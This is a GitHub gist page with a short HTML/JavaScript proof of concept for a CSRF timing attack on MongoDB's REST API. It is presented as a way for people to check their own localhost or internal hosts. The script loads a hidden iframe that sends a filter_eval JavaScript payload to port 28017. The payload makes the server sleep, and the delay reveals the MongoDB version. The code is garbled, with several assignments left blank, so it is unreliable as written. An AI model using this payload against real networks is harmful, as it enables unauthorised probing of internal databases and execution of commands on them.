Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
<title>MongoDB REST API timing attack</title>
<h1>MongoDB REST API timing attack</h1>
<p>Test if MongoDB's REST API exploitable through CSRF on your localhost or on a host in your internal network. This poses a security risk and you should deactivate it.</p>
To check IP <input value = "" id = "ip"> for version
<select id = "version">
<option value = "2">2</option>
<option value = "3">3</option>
click on <button onclick = "check()">check</button>
function check()
target_ip = document.getElementById('ip').value
version = document.getElementById('version').value
first_date =
attack_iframe = document.createElement('iframe');
document.body.appendChild(attack_iframe); = "visibility:hidden;";
attack_iframe.onload = function(){
second_date =
time = second_date-first_date;
if(time > 2000)
alert('Possible match.\nThere might be mongodb '+version+'.x on IP '+target_ip+'\nPlease consider to deactivate it as database commands can be issued even if it\'s just a testing environment.')
alert('There is either no mongodb running on '+target_ip+',\nit wasn\'t started with --rest,\na different port is used\nor another problem occured')
url = 'http://'+target_ip+':28017/admin/$cmd/?filter_eval=function(){if(db.version().charAt(0)=='+version+'){sleep(2000)}}&limit=1';
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment